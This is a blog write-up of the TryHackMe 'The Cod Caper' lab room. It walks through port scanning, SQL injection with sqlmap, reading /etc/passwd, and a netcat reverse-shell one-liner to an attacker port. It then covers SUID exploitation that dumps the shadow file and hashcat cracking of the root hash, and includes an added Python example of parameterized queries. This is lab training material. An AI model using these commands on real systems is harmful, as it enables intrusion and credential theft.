TryHackMe: The Cod Caper Write-Up

A guided room taking you through infiltrating and exploiting a Linux system.

Posted by Siddharth Balyan on November 06, 2020 · 6 mins read

The Cod Caper


Starting with Rustscan to find open ports and pipe the info to nmap.

❯ rustscan -a -- -sC -sV -oN nmap_results

Ports 22 and 80 seem to be the only ones open.

Things that stand out here:

  1. 22: OpenSSH 7.2p2 Ubuntu
  2. 80: Apache HTTPd 2.4.18

Since SSH is rarely a target for extensive enumeration, we can enumerate the web server for hidden directories instead.

❯ gobuster dir -u "" --wordlist=/usr/share/dirbuster/directory-list-2.3-medium.txt -t 75 -x "php,txt,html"

| Tag | Meaning |
| --- | --- |
| dir | Directory search |
| -u | URL to enumerate |
| --wordlist | The wordlist to use for enumeration |
| -t | The number of concurrent threads to use |
| -x | The file extensions to enumerate |

Thoughts: I usually only enumerate directories; not being able to find a directory made me realise I should enumerate file extensions too.

On enumerating file extensions, we get a directory.


Since this is a PHP login form, and PHP login forms are usually vulnerable to SQLi attacks, let’s see if this one is vulnerable to SQLi.

On entering ' in the Username field we get an error, thus confirming the earlier suspicion.
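Why a lone ' produces an error, shown as an added example (not code from the room or from this write-up): when input is concatenated into the SQL text, the quote unbalances the query, while a parameterized query treats it as plain data. Python with an in-memory SQLite database stands in for the room's PHP backend; the table, function names and sample user are all constructed.

```python
import sqlite3

def make_db():
    """Constructed sample data: one user in an in-memory SQLite database.
    (Plaintext password only to keep the demo short; store hashes in practice.)"""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return db

def login_concat(db, username, password):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    query = ("SELECT 1 FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None

def login_param(db, username, password):
    """Hardened pattern: placeholders keep input out of the SQL grammar."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

def probe(login, username):
    """Return 'ok', 'denied' or 'sql-error' for one login attempt."""
    db = make_db()
    try:
        return "ok" if login(db, username, "x") else "denied"
    except sqlite3.Error:
        # The database rejected the statement itself: the symptom the
        # write-up observed after typing ' into the Username field.
        return "sql-error"

if __name__ == "__main__":
    # A bare quote and an ordinary surname containing an apostrophe.
    for name in ("alice", "'", "O'Brien"):
        print(repr(name), probe(login_concat, name), probe(login_param, name))
```

A database error that reaches the browser is also an information leak in its own right, so the hardened handler should log it server-side and return a generic failure.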


To do the injection, let’s use sqlmap to test the form and find the credentials.

❯ sqlmap -u "" --forms --dump

| Tag | Meaning |
| --- | --- |
| -u | Specifies the URL to attack |
| --forms | To automatically select the <form> elements from the page |
| --dump | To retrieve data from the database once the SQLi is found |

On running sqlmap we find the required credentials.

Thoughts: This was my first brush with sqlmap and trying to understand its working was quite insightful

Once we login with the creds we see that,,, we can run arbitrary commands through the webserver??????? Really weird for this to happen but I’ll roll with it.

Now that we can run commands here, we can view what files there are in the current directory using ls;


Or see the users on the system using;

cat /etc/passwd;


It’s better to get a shell on the system now. Let’s try one of the payloads from highoncoffee. The OpenBSD payload for netcat works here;

mkfifo /tmp/lol;nc 1337 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Thoughts: It took me some time to figure out that I just needed to use another payload to get things to work. I should try to use different things when I get stuck.


To find the file where the password is stored as instructed by the room, we use the find command


Thoughts: Trying to find this file was a bit annoying because I was unable to properly use the find command to retrieve the file. I need to do more practice in finding files and learn this command fully.

Inside this file is the required SSH password. Logging in with SSH:

❯ ssh pingu@

Now that we have a proper shell to the machine, we should enumerate the machine using My favourite way to do this is through hosting a server on a local directory with the script and download it on the Target-Machine.

After getting the script on the server, run it to find the juicy stuff and the interesting SUID file.

Thoughts: All these are things I am a bit more familiar with so it was more fun.

As the room explains, the SUID binary loads the shadow file into memory, expects 32 characters of input and then exits. Following the room's instructions, we carry out the binary exploitation.

The binary exploitation will ultimately lead to the shadow file being dumped, including the root hash. We can run this through hashcat using:

❯ hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

And this gives us the final password!

Thoughts on the room: This was quite an interesting room, definitely going to read up on binary exploitation later. Apart from that, I’ve realised that I should just keep doing more rooms.